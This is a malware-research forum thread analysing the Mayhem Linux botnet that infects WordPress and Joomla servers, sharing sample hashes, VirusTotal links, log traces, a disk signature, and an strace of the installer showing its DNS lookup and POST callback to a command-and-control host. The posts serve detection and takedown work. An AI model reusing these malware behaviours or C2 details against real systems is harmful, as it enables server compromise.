[K_Mikhail]

Hello!

Looking for samples with SHA1's:

5ddebe39bdd26cf2aee202bd91d826979595784a
6992ed4a10da4f4b0eae066d07e45492f355f242
71c603c3dbf2b283ab2ee2ae1f95dcaf335b3fce
7b89f0615970d2a43b11fd7158ee36a5df93abc8

from F-Secure article - http://www.f-secure.com/weblog/archives/00002727.html

Thank you!

[stevegs1821]

here's 2 of them. . . .

7b89f0615970d2a43b11fd7158ee36a5df93abc8
71c603c3dbf2b283ab2ee2ae1f95dcaf335b3fce

[unixfreaxjp]

Latest incident Mayhem samples analyzed in here: http://pastebin.com/VPpjSzxx
PHP dropper: https://www.virustotal.com/en/file/03c8 ... /analysis/
ELF installer x32: https://www.virustotal.com/en/file/8983 ... /analysis/
ELF installer x64: https://www.virustotal.com/en/file/77d7 ... /analysis/
Mayhem ELF CMS URL crawler module: https://www.virustotal.com/en/file/3d07 ... /analysis/
Mayhem ELF Wordpress/Joomla! password bruter module: https://www.virustotal.com/en/file/3ec6 ... /analysis/

If you work in AV, please do effort in raising these ELF detection ratio. Thx

#MalwareMustDie!!
+) basic knowledge of the threat: http://blog.malwaremustdie.org/2014/05/ ... lware.html

[unixfreaxjp]

A week ago's Mayhem incident. Starting this one , new code installer was started, giving up some libworker.so to more generic namings:


PHP Installer (dropper): https://www.virustotal.com/en/file/dddb ... /analysis/
Code snips: http://pastebin.com/xa4sGV5a
ELF x32 Mayhem Installer: https://www.virustotal.com/en/file/803d ... /analysis/
ELF x64 Mayhem Installer: https://www.virustotal.com/en/file/9191 ... /analysis/

This is the installer's callback:


I attached PCAP, PHP dropper snips & .so installer samples. See comment (members only).
Please help to raise the detection ratio of these ELFs.

#MalwareMustDie!
+) basic knowledge of the threat: http://blog.malwaremustdie.org/2014/05/ ... lware.html

[unixfreaxjp]

This is a special post, I want to explain about the ELF Mayhem crawler.so, a web remote trigger component/module of Mayhem.
It works to trigger Mayhem installer(PHP) or activated some remote injection.
It is the most used module in Mayhem package by the moronz who used it (you used to call these by "operators" or "bad actors")
The attacker uses this by the Mayhem GUI to connect to a Mayhem infected site to attack ANOTHER infected new sites.
The crawler codes is simple seen, it is a good parameter to block this module's operation.

Code: Select all

0x01808    CRAWL %s level exceeded
0x01821    GET %s HTTP/1.0
0x01832    Host: %s
0x0183F    >,%s,%s%s
0x0184A    http://
0x01857    GET %s%s HTTP/1.0
0x0186A    Host: %s
0x01877    >,%s,%s%s%s
0x01884    >,%s,%s
0x0188D    Q,crawler,%s,new domains %d%s
0x018AC    Q,crawler,%s,-
0x018BC    crawler
0x018E8    /wp-login.php
0x018F6    name="log"
0x01901    /administrator/index.php
0x0191A    joomla

Aiming infected Joomla! and Wordpress sites.

You'll see the trace usage of this crawler in your server's log as per below:

Code: Select all

ns312431.ip-188-165-217.eu - - [31/Jul/2014:11:02:44 +0900] "GET /wp-content/plugins/XXXX/404.php HTTP/1.1" 200 95 "-" "-" "-" -rw-rw-rw- 1 XXXX cst 6624 Jul 31 11:03 crawler.so 

So it is remotely executable, not necessarily via LD_PRELOAD, same as the bruteforce.so and cmsurls.so posted previously. And it was all compiled as package UI snapshot as per announced by Yandex team here: https://www.virusbtn.com/virusbulletin/ ... -fig17.jpg

VirusTotal detection is ..low.. I mean..it is 1 (one)..repeat..ONE! (1/53) https://www.virustotal.com/en/file/637a ... 406876476/

if you work in AV and your AV has Linux scanner product, please make sure your product can scan this, because I found this module in MOSTLY all Mayhem infected sites now, and they are all undetected (sigh..).

Sample is attached (members only). #MalwareMustDie!!
+) basic knowledge of the threat: http://blog.malwaremustdie.org/2014/05/ ... lware.html

[unixfreaxjp]

This is the Mayhem incident in July 30th. The attacker was detected to install the installer as per snipped in log below:

Code: Select all

178-137-18-246-lvv.broadband.kyivstar.net - - [28/Jul/2014:01:16:02 +0900] "GET /wp-content/themes/XXXX/styleimg.php HTTP/1.1" 200 85 "-" "Python-urllib/2.7" "-"

You can see the installer in the attached file (with the binary stipped, sorry)
This installer will create the encrypted drive ".fghv". About this drive, has typical sigs in the first sector as:

Code: Select all

0000   23 74 FA 49 37 F6 DF D0 17 72 08 E1 B1 73 B3 1D    #t.I7....r...s..
0010   B4 D9 54 45 38 5A A9 AB 5D E8 BE 47 30 99 69 EE    ..TE8Z..]..G0.i.
0020   FD FB 8F DB 18 46 E9 31 72 9B 45 0D 03 ED 2E FB    .....F.1r.E.....
0030   BF 0E FB B6 80 F6 40 70 2E 55 57 96 EB EF AC E6    ......@p.UW.....
0040   D8 D4 E9 DE D9 1E 13 F7 D8 D4 E9 DE D9 1E 13 F7    ................

Noted: I think one can apply this sig to Yara or AV scanner to check whether the server is infected.
The tools in below links can be used to read this drive:
http://ultra-embedded.com/fat_filelib
https://github.com/freeoks/SD0_reader
The drives was mounted in every infection of Mayhem with the read write flag, in memory is seen as:

Code: Select all

host    15448  mmd  mem    REG   RW 9,2 12582912 29763122 /home/mmd/0x02E/007/.fghv

The insides will be seen files used for the attack as per annonced by Yandex team here: https://www.virusbtn.com/virusbulletin/ ... -fig11.jpg

In this post I will (generally) debug the installer, with some comments.
The point of this information is to form the mitigation for the threat installation.

1. Since the nature of installation need the LD_PRELOAD interception of the NIX API called /usr/bin/host, you will see every Mayhem infection is loading these modules (i.e. in x64):

Code: Select all

 /lib/x86_64-linux-gnu/libnss_dns-2.13.so
 /lib/x86_64-linux-gnu/libnss_files-2.13.so
 /usr/lib/x86_64-linux-gnu/openssl-1.0.0/engines/libgost.so
 /lib/x86_64-linux-gnu/libm-2.13.so
 /lib/x86_64-linux-gnu/liblzma.so.5.0.0
 /lib/x86_64-linux-gnu/libattr.so.1.1.0
 /usr/lib/libisccc.so.80.0.2
 /lib/x86_64-linux-gnu/libz.so.1.2.7
 /lib/x86_64-linux-gnu/libresolv-2.13.so
 /lib/x86_64-linux-gnu/libkeyutils.so.1.4
 /usr/lib/x86_64-linux-gnu/libkrb5support.so.0.1
 /lib/x86_64-linux-gnu/libcom_err.so.2.1
 /usr/lib/x86_64-linux-gnu/libk5crypto.so.3.1
 /usr/lib/x86_64-linux-gnu/libkrb5.so.3.3
 /usr/lib/libGeoIP.so.1.4.8
 /lib/x86_64-linux-gnu/libc-2.13.so
 /usr/lib/x86_64-linux-gnu/libxml2.so.2.8.0
 /lib/x86_64-linux-gnu/libpthread-2.13.so
 /lib/x86_64-linux-gnu/libcap.so.2.22
 /lib/x86_64-linux-gnu/libdl-2.13.so
 /usr/lib/libisc.so.84.1.0
 /usr/lib/libisccfg.so.82.0.3
 /usr/lib/libbind9.so.80.0.7
 /usr/lib/x86_64-linux-gnu/libcrypto.so.1.0.0
 /usr/lib/x86_64-linux-gnu/libgssapi_krb5.so.2.2
 /usr/lib/libdns.so.88.1.1
 /usr/lib/liblwres.so.80.0.3
 /home/mmd/0x02E/007/libworker.so
 /lib/x86_64-linux-gnu/ld-2.13.so

the libworker.so is the malware, libnss is used to resolve the DNS, and some modules specifically use by malware itself (self explanatory..ie: that crypto & GeoIP)

2. Mayhem installer process:
(malware installer blah.so started with initial PID)

// process self-detached execution after /usr/bin/hosts was executed:

Code: Select all

execve("/home/mmd/0x02E/007/1.20322", ["/home/mmd/0x02E/007/1.20322"], [/* 20 vars */]) = 0

// local addr INET

Code: Select all

socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 6
connect(6, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("DNS SETTING")}, 16) = 0
getsockname(6, {sa_family=AF_INET, sin_port=htons(47377), sin_addr=inet_addr("YOUR_IP")}, [16]) = 0

// uname executed by shell escape:

Code: Select all

execve("/bin/sh", ["sh", "-c", "/bin/uname -a"], [/* 19 vars */]) = 0
write(1, "Linux 1x111 3.2.0-4-amd64 #1 SMP"..., 73 <unfinished ...>

// read the ELF after reforked beforehand..

Code: Select all

read(8, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\0\360\1\0\0\0\0\0"..., 832) = 832
fstat(8, {st_mode=S_IFREG|0755, st_size=1599536, ...}) = 0

// self deletion..creating the encrypted drive:

Code: Select all

unlink("/home/mmd/0x02E/007/libworker.so") = 0
open(".fghv", O_RDWR)       = 8

// reforked, attempt to access "/" (server's root), self closing +open /dev/null..

Code: Select all

clone(Process xxx attached
umask(0)                    = 022
setsid()                    = 20333
chroot("/")                 = -1 EPERM (Operation not permitted)
  :
close(0)                    = 0
close(1)                    = 0
  :
close(1021)                 = -1 EBADF (Bad file descriptor)
close(1022)                 = -1 EBADF (Bad file descriptor)
  :
open("/dev/null", O_RDONLY) = 2
open("/dev/null", O_RDONLY) = 3

// preparing sending DNS request..

Code: Select all

open("/etc/resolv.conf", O_RDONLY) = 4
uname({sys="Linux", node="1x111", ...}) = 0
connect(4, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)
open("/etc/nsswitch.conf", O_RDONLY) = 4
read(4, "# /etc/nsswitch.conf\n#\n# Example"..., 4096) = 475
open("/etc/ld.so.cache", O_RDONLY) = 4
open("/lib/x86_64-linux-gnu/libnss_files.so.2", O_RDONLY) = 4
open("/lib/x86_64-linux-gnu/libnss_dns.so.2", O_RDONLY) = 4

// querying IP address for the CNC..

Code: Select all

socket(PF_INET, SOCK_DGRAM|SOCK_NONBLOCK, IPPROTO_IP) = 4
connect(4, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("8.8.8.8")}, 16) = 0
poll([{fd=4, events=POLLOUT}], 1, 0) = 1 ([{fd=4, revents=POLLOUT}])
sendto(4, "\242U\1\0\0\1\0\0\0\0\0\0\vimbosatelit\3biz\0\0\1\0"..., 33, MSG_NOSIGNAL, NULL, 0) = 33
recvfrom(4, "\242U\201\200\0\1\0\1\0\0\0\0\vimbosatelit\3biz\0\0\1\0"..., 1024, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("8.8.8.8")}, [16]) = 49

// callback sent:

Code: Select all

socket(PF_INET, SOCK_STREAM, IPPROTO_TCP) = 4
connect(4, {sa_family=AF_INET, sin_port=htons(80), sin_addr=inet_addr("62.75.179.242")}, 16) = 0
write(4, "POST /go.php HTTP/1.0\r\nHost: imb"..., 173) = 173
read(4, "HTTP/1.1 404 Not Found\r\nServer: "..., 32768) = 367
read(4, "", 32768)          = 0

This CNC is in Germany, an abused host, I wrote this for the LE follow as verdict:

Code: Select all

$ echo 62.75.179.242   |bash origin.sh
62.75.179.242|static-ip-62-75-179-242.inaddr.ip-pool.com.|8972 | 62.75.128.0/17 | PLUSSERVER | DE | INTERGENIA.DE | INTERGENIA AG

3. Samples for this incident are attached with the PCAP. (members only)
In VT, the
x32 installer ELF: https://www.virustotal.com/en/file/4275 ... 406866832/
x64 installer ELF: https://www.virustotal.com/en/file/dce6 ... 406866857/

If you work in AV entity and suppoting linux/freebsd OS in your marketing pamflets, please help to raise detection ratio of this threat by registering the shared sample to raise the detection ratio. This threat is no joke, it aimed all of Wordpress and Joompla to be a huge CHAOS botnet..

#MalwareMustDie!
+) basic knowledge of the threat: http://blog.malwaremustdie.org/2014/05/ ... lware.html

[K_Mikhail]

Seems to be fresh crawler.so

https://www.virustotal.com/ru/file/acf7 ... 409266744/

[unixfreaxjp]

Some more hashes are in here:
http://www.techiehow.com/content/listin ... hem-botnet

[K_Mikhail]

Here is the more actual list of Mayhem .so binaries (SHA1's):

Code: Select all

039f55c3c44e0a10da38866cc4c920bce538410b_bruteforce.so
0759dd4602c0e7894ada36a5bbadad6c4ac9cd9c_bruteforce.so
0db15d93c71ddda6327122c49ffdb5f107e6d2b7_libworker.so
0f1c66c3bc54c45b1d492565970d51a3c83a582d_libworker.so
116b2ef01b6a0684f6da0cbf51987ac34880ede8_libworker.so
1386353522eeaacf9924b61c4daa4b2c72acdfdc_libworker.so
1a4e7d1077306bea3cb4da1c6c0623c98f634835_libworker.so
1bc66930597a169a240deed9c07fe01d1faec0ff_libworker.so
246652e4d014df7729059103d17a28cab8d2cbb2_libworker.so
247e0457194e7f9b63544d474c7f14b338a926ff_libworker.so
28dd90148019f5b357144e01d9327e0d4aab9792_cmsurls.so
2940ce0a1fdef9f7c177cb6f8fec86e5982bdc97_libworker.so
2a1effc7734dff394fafdbb811d9cfeeceefee8e_libworker.so
2cc2ca86453342f196edb1d1bdcc69e9c814d401_rfiscan.so
319ce46d2a366e8c8eb11d08b822cf9529621c3c_libworker.so
35b76927c5b40441dbe4e4fe4cd414d90ba1ca8f_libworker.so
3bb00cbeac227c60594099fd9461c03bf3c64582_libworker.so
3c6934da2b1b2252608ba904b85c37f9fb11fc8f_libworker.so
3d0eb51d89a18c29a333e5beb049c3f65c8f6b3b_heartbleed.so
3e694325d384df00fbea0c8fe5d0192f2c7a4540_libworker.so
44a81b036284a965d83eacf178d14183a57d3489_libworker.so
463eb52c73445ea83e59ff55f1db119921b38d59_bruteforceng.so
47eca09cfe931f4ee5cb6ffa68c0332ef414e859_libworker.so
4f48391fc98a493906c41da40fe708f39969d7b7_libworker.so
51699011a839aa62f9906393044c3316f4e36022_libworker.so
525de21b0c119f7f8ce6a93173414389ecc627ba_cached.so
55269ece955397e64d356dcd5b1b08dc2d26eb20_libworker.so
55dd7d3d692b9f00f82b98cefe37f538fe6c0734_libworker.so
568f529af326b1d010faf0bd7ba66361f2e10465_libworker.so
56b332c78c4cc9fd0c3262dc8346fc8f5f109d6b_crawlerng.so
583af93281999a925f497d643dd744f31ca1319b_libworker.so
5b7012e52a238079748640f6ca94d12cdbd1b038_libworker.so
5de6f598040fda15de83d9e2c8b53f8ff9bb4d3f_libworker.so
60ae2f0c8fb8f4121828c547b333c4c643b28c5a_libworker.so
6405e0093e5942eed98ec6bbcee917af2b9dbc45_libworker.so
680c2113ffb00aea02c9ea836adc45ac63eb8610_libworker.so
68ece6f8913d6250d5654df0098035ce045a8611_rss-aggr.so
6c17115f8a68eb89650a4defd101663cacb997a1_libworker.so
6c376555bc8f1ba31025797806ac5f1bc1597832_cmsurls.so
6d91ba3dad82c8544330d3da20b72c657eb83ecd_libworker.so
71c603c3dbf2b283ab2ee2ae1f95dcaf335b3fce_libworker.so
7204fff9953d95e600eaa2c15e39cda460953496_libworker.so
772eb8512d054355d675917aed30ceb41f45fba9_libworker.so
7b89f0615970d2a43b11fd7158ee36a5df93abc8_libworker.so
85e84f78568f5846b997807d5896cb712f0945b4_libworker.so
86217b4fd4c42e04d243f2130a8e9e4b5070c9a3_libworker.so
87dd21567b853a1ec7afefaee405880e1ec543d9_libworker.so
88014cedf42937d2f2dd904cc015bf4c809e1f89_libworker.so
8899859332990047a8ad1443cab029ad663d7bad_rss-aggr.so
8da0122382342c7692b6f4ebd94ac09a99e66f37_libworker.so
90ffb5d131f6db224f41508db04dc0de7affda88_libworker.so
9104620758faa58014d1f8310b5c049c6c7e1a53_libworker.so
985a61d97c88cb484ea345d584b736df1928ecf3_libworker.so
9c7472b3774e0ec60d7b5a417e753882ab566f8d_libworker.so
9fac4e729cbda5950931b826335d817c8a61765f_libworker.so
a05b5849e08bae3ddba1d6274b9179c4f81075cf_libworker.so
a17cb6bbe3c8474c10fdbe8ddfb29efe9c5942c8_libworker.so
a99cfde9eea4a0454b1e5fc9a4038c2445a68027_libworker.so
ab8f3e01451f31796f378b9581e629d0916ac5a5_libworker.so
ae828f04fc53c49370eeae122c9f9d26b2ae50c5_libworker.so
af7c1e4ef63fdd07979479779101f3774dfcc74c_libworker.so
b4795623ae31202710ac569aa04d96eda1e504ba_bruteforceng.so
b72e989fcfc147aed3ab1e6a7b6510d8b3ef503c_ftpbrute.so
bb163db5179b32af832611a8b2c4af0787c3d958_crawler.so
bf2ad57c8847ade5f582cd55963932600a639654_wpenum.so
c0b32efc8f7e1af66086b2adfff07e8cc5dd1a62_libworker.so
c31f35ae3242b8b16635f766ebcc3bf0e596d826_libworker.so
c5d3ea21967bbe6892ceb7f1c3f57d59576e8ee6_libworker.so
c635bff21668b4a3667fa8b6805573569a6abdb4_crawler.so
c6f8a5f63f15ff8a73add693e5f2b58bc2063329_crawlerip.so
c855a623bf23e7cb22c0e0e2854f74f7c70aadfe_wpenum.so
cb7a758fe2680a6082d14c8f9d93ab8c9d6d30b0_libworker.so
cbaab3c8b6659f6b340c403729e542c3a17c04d8_crawler.so
cd00010d9454c504bebec00668c40c0722f2460f_libworker.so
d020020b87568a8d3e4367c44a361effa9c88798_bruteforce.so
d0f029375bb9609034297354adafb866971c5503_libworker.so
d2b5a5fa696e6be13b3503c376d7d18112f3f427_libworker.so
d41e9d09827c9c4b2ba99642b3913d4a089dd200_bruteforceng.so
d4a1bc99eaf8d22f573a0a063b27b62111a6a192_bruteforce.so
da9fbebba9cf3d12cd6b042266746a2425bc3ee1_bruteforce.so
dc4cf21691645f856c989b935b9db7237c91e37a_libworker.so
de68cb6a027d366190b7e74255c466a6fb28e49b_cmsurls.so
dff117ac09221f55719d7b7b52aaee778249ab8c_wpenum.so
e1057d25b81044c947286d8910e7277bfb08787e_libworker.so
e785058dd3ed369405b0de829689f496f8b46960_libworker.so
e7ff524f5ae35a16dcbbc8fcf078949fcf8d45b0_atom-aggregator.so
ea6f73259409d8250f2b582069bcfe1369da5686_cached.so
ecfddf0af1138fb74549473bc460347b719833ad_libworker.so
f5e8b5f071d432bcd2aefa8bda1953090ba4dcec_bruteforce.so
f5f10ebec36b96f3b9fe664521fd494e69df3602_libworker.so
f73981df40e732a682b2d2ccdcb92b07185a9f47_atom-aggregator.so
fa2763b3bd5592976f259baf0ddb98c722c07656_libworker.so
fa7e9dad7ca05e1c2405cc1aded68e537aacc3c3_libworker.so
fd8d1519078d263cce056f16b4929d62e0da992a_libworker.so
fe59df58e03c304b2554117d41c2076233f1c165_libworker.so

PHP-droppers list (SHA1's):

Code: Select all

001b40c56d51759f904a79335172b9e6bba665a8_mayhem_starter.ph#
0088c301412c2d1bb28c82ea3eaf77c66848bf84_system.ph#
0bf5a751971f32ea8be0874ea8ea2b8bc325e211_function_php.ph#
1f7adac290d7c9ea201bf13481877e04fd2c3eec_oldcash.ph#
276169b217efc075ed546503b10c8a665f901676_mayhem_starter.ph#
450a83f9d635485cc3362ec6595534e9bfc6b6fa_log.ph#
5df3bd8c9d1a748efb0b1346b78a3536f4340876_system.ph#
687d7f48f6424efbe2a36b6036364f235d0a6fe3_mayhem_starter.ph#
8fd0ddb9272c4c3979a6fc16d3deb17ddce9eb9a_404.ph#
91371d109310484f1d002af15dccc2985f6d9130_htm_themes.ph#
94a475abf7b85bf8770be60f1c2b230cdcfbfb35_rss.ph#
9a368f5b3f322c61fb0db2843ea2e50facc07dfa_atom-lists.ph#
a4db6451b57dc3c833e062b481420df4eccee0ed_rsscollect.ph#
aaf46e7eb3b22f55b242569d6d559c2fdd5a96bf_404_bl.ph#
ce9a1052cea1c39a9f2d0cd7ca43ffb4cc71c0bd_exostyle.ph#
d75054424b98af596e8b1d8e1b3923ca2462e3ee_system.ph#
e259667922fcbeb54e8d18e2b10e7de0582685cc_styleimg.ph#
e27c526e42fc0fa832dfd81fe8fc45c29524c540_jquery.js.ph#
f06c45db3200a112bf5f42628b6f2b4cf1f17d7c_atom-conf.ph#
f52a54ede7c1211288c659a9d25d837b06992454_mayhem_starter.ph#
f7413e74d09f867ddfa2a2a98e7512ff48fd613b_oldstyle.ph#
f89aedb3994c5939a2f92980c81331c639c065e1_sears.ph#

Files with SHA1's:
5ddebe39bdd26cf2aee202bd91d826979595784a
6992ed4a10da4f4b0eae066d07e45492f355f242

are still absent.

[unixfreaxjp]

#Shellshock version spotted. Installer is in Perl: http://pastebin.com/rdTJ4HyJ
Use my small script to extract the binaries safely here: https://gist.github.com/unixfreaxjp/aca ... ede2c70cde
I will not disclose the shellshock used since a higher matter security is involved.
Samples:
https://www.virustotal.com/en/file/4e9c ... 412653706/
https://www.virustotal.com/en/file/87f7 ... 412653725/
At this moment, the things that I can share is what written in virus total comment.

CNC:

Code: Select all

IP: 188.120.246.60
Reversed IP: dackjaniels.net.
ASN: 29182
CIDR: 188.120.240.0/21
ISP Prefix: ISPSYSTEM
Country: LU / Luxembourg
ISP: ISPSYSTEM.COM / ISPSYSTEM CJSC

Some snapshot as poc of CNC: